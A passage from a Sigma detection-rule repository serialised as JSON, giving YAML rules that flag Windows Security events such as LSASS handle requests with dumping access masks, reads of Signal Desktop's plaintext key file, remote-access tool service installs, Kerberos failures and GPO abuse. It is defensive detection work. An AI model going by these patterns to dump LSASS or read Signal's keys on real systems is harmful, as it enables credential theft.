  },
  {
    "path": "rules/windows/builtin/security/win_security_scm_database_privileged_operation.yml",
    "content": "title: SCM Database Privileged Operation\nid: dae8171c-5ec6-4396-b210-8466585b53e9\nstatus: test\ndescription: Detects non-system users performing privileged operation os the SCM database\nreferences:\n    - https://threathunterplaybook.com/hunts/windows/190826-RemoteSCMHandle/notebook.html\nauthor: Roberto Rodriguez @Cyb3rWard0g, Tim Shelton\ndate: 2019-08-15\nmodified: 2022-09-18\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4674\n        ObjectType: 'SC_MANAGER OBJECT'\n        ObjectName: 'servicesactive'\n        PrivilegeList: 'SeTakeOwnershipPrivilege'\n    filter:\n        SubjectLogonId: '0x3e4'\n        ProcessName|endswith: ':\\Windows\\System32\\services.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_sdelete_potential_secure_deletion.yml",
    "content": "title: Potential Secure Deletion with SDelete\nid: 39a80702-d7ca-4a83-b776-525b1f86a36d\nstatus: test\ndescription: Detects files that have extensions commonly seen while SDelete is used to wipe files.\nreferences:\n    - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/sdelete.htm\n    - https://www.jpcert.or.jp/english/pub/sr/ir_research.html\n    - https://learn.microsoft.com/en-gb/sysinternals/downloads/sdelete\nauthor: Thomas Patzke\ndate: 2017-06-14\nmodified: 2024-12-13\ntags:\n    - attack.impact\n    - attack.defense-evasion\n    - attack.t1070.004\n    - attack.t1027.005\n    - attack.t1485\n    - attack.t1553.002\n    - attack.s0195\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID:\n            - 4656\n            - 4663\n            - 4658\n        ObjectName|endswith:\n            - '.AAA'\n            - '.ZZZ'\n    condition: selection\nfalsepositives:\n    - Legitimate usage of SDelete\n    - Files that are interacted with that have these extensions legitimately\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_service_install_remote_access_software.yml",
    "content": "title: Remote Access Tool Services Have Been Installed - Security\nid: c8b00925-926c-47e3-beea-298fd563728e\nrelated:\n    - id: 1a31b18a-f00c-4061-9900-f735b96c99fc\n      type: similar\nstatus: test\ndescription: Detects service installation of different remote access tools software. These software are often abused by threat actors to perform\nreferences:\n    - https://redcanary.com/blog/misbehaving-rats/\nauthor: Connor Martin, Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-23\nmodified: 2024-12-07\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.execution\n    - attack.t1543.003\n    - attack.t1569.002\nlogsource:\n    product: windows\n    service: security\n    definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697\ndetection:\n    selection:\n        EventID: 4697\n        ServiceName|contains:\n            # Based on https://github.com/SigmaHQ/sigma/pull/2841\n            - 'AmmyyAdmin' # https://www.ammyy.com/en/\n            - 'AnyDesk' # https://usersince99.medium.com/windows-privilege-escalation-8214ceaf4db8\n            - 'Atera'\n            - 'BASupportExpressSrvcUpdater' # https://www.systemlookup.com/O23/6837-BASupSrvcUpdater_exe.html\n            - 'BASupportExpressStandaloneService' # https://www.systemlookup.com/O23/6839-BASupSrvc_exe.html\n            - 'chromoting'\n            - 'GoToAssist' # https://www.goto.com/it-management/resolve\n            - 'GoToMyPC' # https://get.gotomypc.com/\n            - 'jumpcloud'\n            - 'LMIGuardianSvc' # https://www.logmein.com/\n            - 'LogMeIn' # https://www.logmein.com/\n            - 'monblanking'\n            - 'Parsec'\n            - 'RManService' # https://www.systemlookup.com/O23/7855-rutserv_exe.html\n            - 'RPCPerformanceService' # https://www.remotepc.com/\n            - 'RPCService' # https://www.remotepc.com/\n            - 'SplashtopRemoteService' # https://www.splashtop.com/\n            - 'SSUService'\n            - 'TeamViewer'\n            - 'TightVNC' # https://www.tightvnc.com/\n            - 'vncserver'\n            - 'Zoho'\n    condition: selection\nfalsepositives:\n    - The rule doesn't look for anything suspicious so false positives are expected. If you use one of the tools mentioned, comment it out\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_service_installation_by_unusal_client.yml",
    "content": "title: Service Installed By Unusual Client - Security\nid: c4e92a97-a9ff-4392-9d2d-7a4c642768ca\nrelated:\n    - id: 71c276aa-49cd-43d2-b920-2dcd3e6962d5\n      type: similar\nstatus: test\ndescription: Detects a service installed by a client which has PID 0 or whose parent has PID 0\nreferences:\n    - https://www.elastic.co/guide/en/security/current/windows-service-installed-via-an-unusual-client.html\n    - https://www.x86matthew.com/view_post?id=create_svc_rpc\n    - https://twitter.com/SBousseaden/status/1490608838701166596\nauthor: Tim Rauch (Nextron Systems), Elastic (idea)\ndate: 2022-09-15\nmodified: 2023-01-04\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1543\nlogsource:\n    service: security\n    product: windows\n    definition: 'Requirements: The System Security Extension audit subcategory need to be enabled to log the EID 4697'\ndetection:\n    selection_eid:\n        EventID: 4697\n    selection_pid:\n        - ClientProcessId: 0\n        - ParentProcessId: 0\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_signal_sensitive_config_access.yml",
    "content": "title: File Access Of Signal Desktop Sensitive Data\nid: 5d6c375a-18ae-4952-b4f6-8b803f6c8555\nstatus: experimental\ndescription: |\n    Detects access to Signal Desktop's sensitive data files: db.sqlite and config.json.\n    The db.sqlite file in Signal Desktop stores all locally saved messages in an encrypted SQLite database, while the config.json contains the decryption key needed to access that data.\n    Since the key is stored in plain text, a threat actor who gains access to both files can decrypt and read sensitive messages without needing the users credentials.\n    Currently the rule only covers the default Signal installation path in AppData\\Roaming. Signal Portable installations may use different paths based on user configuration. Additional paths can be added to the selection as needed.\nreferences:\n    - https://cloud.google.com/blog/topics/threat-intelligence/russia-targeting-signal-messenger/\n    - https://vmois.dev/query-signal-desktop-messages-sqlite/\nauthor: Andreas Braathen (mnemonic.io)\ndate: 2025-10-19\ntags:\n    - attack.credential-access\n    - attack.t1003\nlogsource:\n    product: windows\n    service: security\n    definition: 'Requirements: System Access Control List (SACL) policy with attributes List folder/read data on Objects'\ndetection:\n    selection:\n        EventID: 4663\n        ObjectType: 'File'\n        ObjectName|contains: '\\AppData\\Roaming\\Signal\\'\n        ObjectName|endswith:\n            - '\\config.json'\n            - '\\db.sqlite'\n    filter_main_signal:\n        ProcessName|endswith:\n            - '\\signal-portable.exe'\n            - '\\signal.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unlikely, but possible from AV or backup software accessing the files.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_smb_file_creation_admin_shares.yml",
    "content": "title: SMB Create Remote File Admin Share\nid: b210394c-ba12-4f89-9117-44a2464b9511\nstatus: test\ndescription: Look for non-system accounts SMB accessing a file with write (0x2) access mask via administrative share (i.e C$).\nreferences:\n    - https://github.com/OTRF/ThreatHunter-Playbook/blob/f7a58156dbfc9b019f17f638b8c62d22e557d350/playbooks/WIN-201012004336.yaml\n    - https://securitydatasets.com/notebooks/atomic/windows/lateral_movement/SDWIN-200806015757.html?highlight=create%20file\nauthor: Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)\ndate: 2020-08-06\nmodified: 2025-10-17\ntags:\n    - attack.lateral-movement\n    - attack.t1021.002\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 5145\n        ShareName|endswith: 'C$'\n        AccessMask: '0x2'\n    filter_main_subjectusername:\n        SubjectUserName|endswith: '$'\n    filter_optional_local_ip:\n        IpAddress: '::1'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_susp_add_domain_trust.yml",
    "content": "title: A New Trust Was Created To A Domain\nid: 0255a820-e564-4e40-af2b-6ac61160335c\nstatus: stable\ndescription: Addition of domains is seldom and should be verified for legitimacy.\nreferences:\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4706\nauthor: Thomas Patzke\ndate: 2019-12-03\nmodified: 2024-01-16\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1098\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4706\n    condition: selection\nfalsepositives:\n    - Legitimate extension of domain structure\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_susp_add_sid_history.yml",
    "content": "title: Addition of SID History to Active Directory Object\nid: 2632954e-db1c-49cb-9936-67d1ef1d17d2\nstatus: stable\ndescription: An attacker can use the SID history attribute to gain additional privileges.\nreferences:\n    - https://adsecurity.org/?p=1772\nauthor: Thomas Patzke, @atc_project (improvements)\ndate: 2017-02-19\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1134.005\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection1:\n        EventID:\n            - 4765\n            - 4766\n    selection2:\n        EventID: 4738\n    selection3:\n        SidHistory:\n            - '-'\n            - '%%1793'\n    filter_null:\n        SidHistory:\n    condition: selection1 or (selection2 and not selection3 and not filter_null)\nfalsepositives:\n    - Migration of an account into a new domain\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_susp_computer_name.yml",
    "content": "title: Win Susp Computer Name Containing Samtheadmin\nid: 39698b3f-da92-4bc6-bfb5-645a98386e45\nstatus: test\ndescription: Detects suspicious computer name samtheadmin-{1..100}$ generated by hacktool\nreferences:\n    - https://twitter.com/malmoeb/status/1511760068743766026\n    - https://github.com/helloexp/0day/blob/614227a7b9beb0e91e7e2c6a5e532e6f7a8e883c/00-CVE_EXP/CVE-2021-42287/sam-the-admin/sam_the_admin.py\nauthor: elhoim\ndate: 2022-09-09\nmodified: 2023-01-04\ntags:\n    - attack.initial-access\n    - attack.defense-evasion\n    - cve.2021-42278\n    - cve.2021-42287\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1078\nlogsource:\n    service: security\n    product: windows\ndetection:\n    # Not adding an EventID on purpose to try to match on any event in security (including use of account), not just 4741 (computer account created)\n    selection1:\n        SamAccountName|startswith: 'SAMTHEADMIN-'\n        SamAccountName|endswith: '$'\n    selection2:\n        TargetUserName|startswith: 'SAMTHEADMIN-'\n        TargetUserName|endswith: '$'\n    condition: 1 of selection*\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_susp_dsrm_password_change.yml",
    "content": "title: Password Change on Directory Service Restore Mode (DSRM) Account\nid: 53ad8e36-f573-46bf-97e4-15ba5bf4bb51\nrelated:\n    - id: b61e87c0-50db-4b2e-8986-6a2be94b33b0\n      type: similar\nstatus: stable\ndescription: |\n    Detects potential attempts made to set the Directory Services Restore Mode administrator password.\n    The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers.\n    Attackers may change the password in order to obtain persistence.\nreferences:\n    - https://adsecurity.org/?p=1714\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4794\nauthor: Thomas Patzke\ndate: 2017-02-19\nmodified: 2020-08-23\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1098\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4794\n    condition: selection\nfalsepositives:\n    - Initial installation of a domain controller.\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_susp_failed_logon_reasons.yml",
    "content": "title: Account Tampering - Suspicious Failed Logon Reasons\nid: 9eb99343-d336-4020-a3cd-67f3819e68ee\nstatus: test\ndescription: This method uses uncommon error codes on failed logons to determine suspicious activity and tampering with accounts that have been disabled or somehow restricted.\nreferences:\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4625\n    - https://twitter.com/SBousseaden/status/1101431884540710913\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-02-19\nmodified: 2025-10-17\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.initial-access\n    - attack.t1078\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection_eid:\n        EventID:\n            - 4625\n            - 4776\n    selection_status:\n        - Status:\n              - '0xC0000072'  # User logon to account disabled by administrator\n              - '0xC000006F'  # User logon outside authorized hours\n              - '0xC0000070'  # User logon from unauthorized workstation\n              - '0xC0000413'  # Logon Failure: The machine you are logging onto is protected by an authentication firewall. The specified account is not allowed to authenticate to the machine\n              - '0xC000018C'  # The logon request failed because the trust relationship between the primary domain and the trusted domain failed\n              - '0xC000015B'  # The user has not been granted the requested logon type (aka logon right) at this machine\n        - SubStatus:\n              - '0xC0000072'  # User logon to account disabled by administrator\n              - '0xC000006F'  # User logon outside authorized hours\n              - '0xC0000070'  # User logon from unauthorized workstation\n              - '0xC0000413'  # Logon Failure: The machine you are logging onto is protected by an authentication firewall. The specified account is not allowed to authenticate to the machine\n              - '0xC000018C'  # The logon request failed because the trust relationship between the primary domain and the trusted domain failed\n              - '0xC000015B'  # The user has not been granted the requested logon type (aka logon right) at this machine\n    filter:\n        SubjectUserSid: 'S-1-0-0'\n    condition: all of selection_* and not filter\nfalsepositives:\n    - User using a disabled account\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_susp_group_policy_abuse_privilege_addition.yml",
    "content": "title: Group Policy Abuse for Privilege Addition\nid: 1c480e10-7ee1-46d4-8ed2-85f9789e3ce4\nstatus: test\ndescription: |\n    Detects the first occurrence of a modification to Group Policy Object Attributes to add privileges to user accounts or use them to add users as local admins.\nauthor: Elastic, Josh Nickels, Marius Rothenbücher\nreferences:\n    - https://www.elastic.co/guide/en/security/current/group-policy-abuse-for-privilege-addition.html#_setup_275\ndate: 2024-09-04\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1484.001\nlogsource:\n    product: windows\n    service: security\n    definition: 'Requirements: The \"Audit Directory Service Changes\" logging policy must be configured in order to receive events.'\ndetection:\n    selection:\n        EventID: 5136\n        AttributeLDAPDisplayName: 'gPCMachineExtensionNames'\n        AttributeValue|contains:\n            - '827D319E-6EAC-11D2-A4EA-00C04F79F83A'\n            - '803E14A0-B4FB-11D0-A0D0-00A0C90F574B'\n    condition: selection\nfalsepositives:\n    - Users allowed to perform these modifications (user found in field SubjectUserName)\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_susp_group_policy_startup_script_added_to_gpo.yml",
    "content": "title: Startup/Logon Script Added to Group Policy Object\nid: 123e4e6d-b123-48f8-b261-7214938acaf0\nstatus: test\ndescription: |\n    Detects the modification of Group Policy Objects (GPO) to add a startup/logon script to users or computer objects.\nreferences:\n    - https://www.elastic.co/guide/en/security/current/startup-logon-script-added-to-group-policy-object.html\nauthor: Elastic, Josh Nickels, Marius Rothenbücher\ndate: 2024-09-06\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1484.001\n    - attack.t1547\nlogsource:\n    product: windows\n    service: security\n    definition: 'The advanced audit policy setting \"Object Access > Audit Detailed File Share\" must be configured for Success/Failure'\ndetection:\n    selection_eventid:\n        EventID:\n            - 5136\n            - 5145\n    selection_attributes_main:\n        AttributeLDAPDisplayName:\n            - 'gPCMachineExtensionNames'\n            - 'gPCUserExtensionNames'\n        AttributeValue|contains: '42B5FAAE-6536-11D2-AE5A-0000F87571E3'\n    selection_attributes_optional:\n        AttributeValue|contains:\n            - '40B6664F-4972-11D1-A7CA-0000F87571E3'\n            - '40B66650-4972-11D1-A7CA-0000F87571E3'\n    selection_share:\n        ShareName|endswith: '\\SYSVOL'\n        RelativeTargetName|endswith:\n            - '\\scripts.ini'\n            - '\\psscripts.ini'\n        AccessList|contains: '%%4417'\n    condition: selection_eventid and (all of selection_attributes_* or selection_share)\nfalsepositives:\n    - Legitimate execution by system administrators.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_susp_kerberos_manipulation.yml",
    "content": "title: Kerberos Manipulation\nid: f7644214-0eb0-4ace-9455-331ec4c09253\nstatus: test\ndescription: Detects failed Kerberos TGT issue operation. This can be a sign of manipulations of TGT messages by an attacker.\nreferences:\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4771\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-02-10\nmodified: 2024-01-16\ntags:\n    - attack.credential-access\n    - attack.t1212\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID:\n            - 675\n            - 4768\n            - 4769\n            - 4771\n        Status:\n            - '0x9'\n            - '0xA'\n            - '0xB'\n            - '0xF'\n            - '0x10'\n            - '0x11'\n            - '0x13'\n            - '0x14'\n            - '0x1A'\n            - '0x1F'\n            - '0x21'\n            - '0x22'\n            - '0x23'\n            - '0x24'\n            - '0x26'\n            - '0x27'\n            - '0x28'\n            - '0x29'\n            - '0x2C'\n            - '0x2D'\n            - '0x2E'\n            - '0x2F'\n            - '0x31'\n            - '0x32'\n            - '0x3E'\n            - '0x3F'\n            - '0x40'\n            - '0x41'\n            - '0x43'\n            - '0x44'\n    condition: selection\nfalsepositives:\n    - Faulty legacy applications\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_susp_ldap_dataexchange.yml",
    "content": "title: Suspicious LDAP-Attributes Used\nid: d00a9a72-2c09-4459-ad03-5e0a23351e36\nstatus: test\ndescription: Detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies.\nreferences:\n    - https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961\n    - https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/\n    - https://github.com/fox-it/LDAPFragger\nauthor: xknow @xknow_infosec\ndate: 2019-03-24\nmodified: 2022-10-05\ntags:\n    - attack.t1001.003\n    - attack.command-and-control\nlogsource:\n    product: windows\n    service: security\n    definition: The \"Audit Directory Service Changes\" logging policy must be configured in order to receive events. Audit events are generated only for objects with configured system access control lists (SACLs). Audit events are generated only for objects with configured system access control lists (SACLs) and only when accessed in a manner that matches their SACL settings. This policy covers the following events ids - 5136, 5137, 5138, 5139, 5141. Note that the default policy does not cover User objects. For that a custom AuditRule need to be setup (See https://github.com/OTRF/Set-AuditRule)\ndetection:\n    selection:\n        EventID: 5136\n        AttributeValue|contains: '*'\n        AttributeLDAPDisplayName:\n            - 'primaryInternationalISDNNumber'\n            - 'otherFacsimileTelephoneNumber'\n            - 'primaryTelexNumber'\n    condition: selection\nfalsepositives:\n    - Companies, who may use these default LDAP-Attributes for personal information\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_susp_local_anon_logon_created.yml",
    "content": "title: Suspicious Windows ANONYMOUS LOGON Local Account Created\nid: 1bbf25b9-8038-4154-a50b-118f2a32be27\nstatus: test\ndescription: Detects the creation of suspicious accounts similar to ANONYMOUS LOGON, such as using additional spaces. Created as an covering detection for exclusion of Logon Type 3 from ANONYMOUS LOGON accounts.\nreferences:\n    - https://twitter.com/SBousseaden/status/1189469425482829824\nauthor: James Pemberton / @4A616D6573\ndate: 2019-10-31\nmodified: 2022-10-09\ntags:\n    - attack.persistence\n    - attack.t1136.001\n    - attack.t1136.002\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4720\n        SamAccountName|contains|all:\n            - 'ANONYMOUS'\n            - 'LOGON'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_susp_logon_explicit_credentials.yml",
    "content": "title: Suspicious Remote Logon with Explicit Credentials\nid: 941e5c45-cda7-4864-8cea-bbb7458d194a\nstatus: test\ndescription: Detects suspicious processes logging on with explicit credentials\nreferences:\n    - https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view\nauthor: oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Tim Shelton\ndate: 2020-10-05\nmodified: 2022-08-03\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.t1078\n    - attack.lateral-movement\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4648\n        ProcessName|endswith:\n            - '\\cmd.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\winrs.exe'\n            - '\\wmic.exe'\n            - '\\net.exe'\n            - '\\net1.exe'\n            - '\\reg.exe'\n    filter1:\n        TargetServerName: 'localhost'\n    filter2:\n        SubjectUserName|endswith: '$'\n        TargetUserName|endswith: '$'\n    condition: selection and not 1 of filter*\nfalsepositives:\n    - Administrators that use the RunAS command or scheduled tasks\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_susp_lsass_dump.yml",
    "content": "title: Password Dumper Activity on LSASS\nid: aa1697b7-d611-4f9a-9cb2-5125b4ccfd5c\nstatus: test\ndescription: Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN\nreferences:\n    - https://twitter.com/jackcr/status/807385668833968128\nauthor: sigma\ndate: 2017-02-12\nmodified: 2022-10-09\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4656\n        ProcessName|endswith: '\\lsass.exe'\n        AccessMask: '0x705'\n        ObjectType: 'SAM_DOMAIN'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_susp_lsass_dump_generic.yml",
    "content": "title: Potentially Suspicious AccessMask Requested From LSASS\nid: 4a1b6da0-d94f-4fc3-98fc-2d9cb9e5ee76\nstatus: test\ndescription: Detects process handle on LSASS process with certain access mask\nreferences:\n    - https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html\n    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment\nauthor: Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update)\ndate: 2019-11-01\nmodified: 2023-12-19\ntags:\n    - attack.credential-access\n    - car.2019-04-004\n    - attack.t1003.001\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection_1:\n        EventID: 4656 # A handle to an object was requested.\n        ObjectName|endswith: '\\lsass.exe'\n        AccessMask|contains:\n            - '0x40'\n            - '0x1400'\n            # - '0x1000'  # minimum access requirements to query basic info from service\n            - '0x100000'\n            - '0x1410'    # car.2019-04-004\n            - '0x1010'    # car.2019-04-004\n            - '0x1438'    # car.2019-04-004\n            - '0x143a'    # car.2019-04-004\n            - '0x1418'    # car.2019-04-004\n            - '0x1f0fff'\n            - '0x1f1fff'\n            - '0x1f2fff'\n            - '0x1f3fff'\n    selection_2:\n        EventID: 4663 # An attempt was made to access an object\n        ObjectName|endswith: '\\lsass.exe'\n        AccessList|contains:\n            - '4484'\n            - '4416'\n    filter_main_specific:\n        ProcessName|endswith:\n            - '\\csrss.exe'\n            - '\\GamingServices.exe'\n            - '\\lsm.exe'\n            - '\\MicrosoftEdgeUpdate.exe'\n            - '\\minionhost.exe'  # Cyberreason\n            - '\\MRT.exe'         # MS Malware Removal Tool\n            - '\\MsMpEng.exe'     # Defender\n            - '\\perfmon.exe'\n            - '\\procexp.exe'\n            - '\\procexp64.exe'\n            - '\\svchost.exe'\n            - '\\taskmgr.exe'\n            - '\\thor.exe'        # THOR\n            - '\\thor64.exe'      # THOR\n            - '\\vmtoolsd.exe'\n            - '\\VsTskMgr.exe'    # McAfee Enterprise\n            - '\\wininit.exe'\n            - '\\wmiprvse.exe'\n            - 'RtkAudUService64' # https://medium.com/falconforce/the-curious-case-of-realtek-and-lsass-33fc0c8482ff\n        ProcessName|contains:\n            - ':\\Program Files (x86)\\'\n            - ':\\Program Files\\'\n            - ':\\ProgramData\\Microsoft\\Windows Defender\\Platform\\'\n            - ':\\Windows\\SysNative\\'\n            - ':\\Windows\\System32\\'\n            - ':\\Windows\\SysWow64\\'\n            - ':\\Windows\\Temp\\asgard2-agent\\'\n    filter_main_generic:\n        ProcessName|contains: ':\\Program Files'  # too many false positives with legitimate AV and EDR solutions\n    filter_main_exact:\n        ProcessName|endswith:\n            - ':\\Windows\\System32\\taskhostw.exe'\n            - ':\\Windows\\System32\\msiexec.exe'\n            - ':\\Windows\\CCM\\CcmExec.exe'\n    filter_main_sysmon:\n        ProcessName|endswith: ':\\Windows\\Sysmon64.exe'\n        AccessList|contains: '%%4484'\n    filter_main_aurora:\n        ProcessName|contains: ':\\Windows\\Temp\\asgard2-agent-sc\\aurora\\'\n        ProcessName|endswith: '\\aurora-agent-64.exe'\n        AccessList|contains: '%%4484'\n    filter_main_scenarioengine:\n        # Example: C:\\a70de9569c3a5aa22184ef52a890177b\\x64\\SCENARIOENGINE.EXE\n        ProcessName|endswith: '\\x64\\SCENARIOENGINE.EXE'\n        AccessList|contains: '%%4484'\n    filter_main_avira1:\n        ProcessName|contains|all:\n            - ':\\Users\\'\n            - '\\AppData\\Local\\Temp\\is-'\n        ProcessName|endswith: '\\avira_system_speedup.tmp'\n        AccessList|contains: '%%4484'\n    filter_main_avira2:\n        ProcessName|contains: ':\\Windows\\Temp\\'\n        ProcessName|endswith: '\\avira_speedup_setup_update.tmp'\n        AccessList|contains: '%%4484'\n    filter_main_snmp:\n        ProcessName|endswith: ':\\Windows\\System32\\snmp.exe'\n        AccessList|contains: '%%4484'\n    filter_main_googleupdate:\n        ProcessName|contains: ':\\Windows\\SystemTemp\\'\n        ProcessName|endswith: '\\GoogleUpdate.exe'\n        AccessList|contains: '%%4484'\n    filter_optional_procmon:\n        ProcessName|endswith:\n            - '\\procmon64.exe'\n            - '\\procmon.exe'\n        AccessList|contains: '%%4484'\n    condition: 1 of selection_* and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate software accessing LSASS process for legitimate reason; update the whitelist with it\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_susp_net_recon_activity.yml",
    "content": "title: Reconnaissance Activity\nid: 968eef52-9cff-4454-8992-1e74b9cbad6c\nstatus: test\ndescription: Detects activity as \"net user administrator /domain\" and \"net group domain admins /domain\"\nreferences:\n    - https://findingbad.blogspot.de/2017/01/hunting-what-does-it-look-like.html\nauthor: Florian Roth (Nextron Systems), Jack Croock (method), Jonhnathan Ribeiro (improvements), oscd.community\ndate: 2017-03-07\nmodified: 2022-08-22\ntags:\n    - attack.discovery\n    - attack.t1087.002\n    - attack.t1069.002\n    - attack.s0039\nlogsource:\n    product: windows\n    service: security\n    definition: The volume of Event ID 4661 is high on Domain Controllers and therefore \"Audit SAM\" and \"Audit Kernel Object\" advanced audit policy settings are not configured in the recommendations for server systems\ndetection:\n    selection:\n        EventID: 4661\n        AccessMask: '0x2d'\n        ObjectType:\n            - 'SAM_USER'\n            - 'SAM_GROUP'\n        ObjectName|startswith: 'S-1-5-21-'\n        ObjectName|endswith:\n            - '-500'\n            - '-512'\n    condition: selection\nfalsepositives:\n    - Administrator activity\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_susp_opened_encrypted_zip.yml",
    "content": "title: Password Protected ZIP File Opened\nid: 00ba9da1-b510-4f6b-b258-8d338836180f\nstatus: test\ndescription: Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.\nreferences:\n    - https://twitter.com/sbousseaden/status/1523383197513379841\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-05-09\ntags:\n    - attack.defense-evasion\n    - attack.t1027\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 5379\n        TargetName|contains: 'Microsoft_Windows_Shell_ZipFolder:filename'\n    filter:  # avoid overlaps with 54f0434b-726f-48a1-b2aa-067df14516e4\n        TargetName|contains: '\\Temporary Internet Files\\Content.Outlook'\n    condition: selection and not filter\nfalsepositives:\n    - Legitimate used of encrypted ZIP files\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_susp_opened_encrypted_zip_filename.yml",
    "content": "title: Password Protected ZIP File Opened (Suspicious Filenames)\nid: 54f0434b-726f-48a1-b2aa-067df14516e4\nstatus: test\ndescription: Detects the extraction of password protected ZIP archives with suspicious file names. See the filename variable for more details on which file has been opened.\nreferences:\n    - https://twitter.com/sbousseaden/status/1523383197513379841\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-05-09\ntags:\n    - attack.command-and-control\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.t1105\n    - attack.t1036\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 5379\n        TargetName|contains: 'Microsoft_Windows_Shell_ZipFolder:filename'\n    selection_filename:\n        TargetName|contains:\n            - 'invoice'\n            - 'new order'\n            - 'rechnung'\n            - 'factura'\n            - 'delivery'\n            - 'purchase'\n            - 'order'\n            - 'payment'\n    condition: selection and selection_filename\nfalsepositives:\n    - Legitimate used of encrypted ZIP files\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_susp_opened_encrypted_zip_outlook.yml",
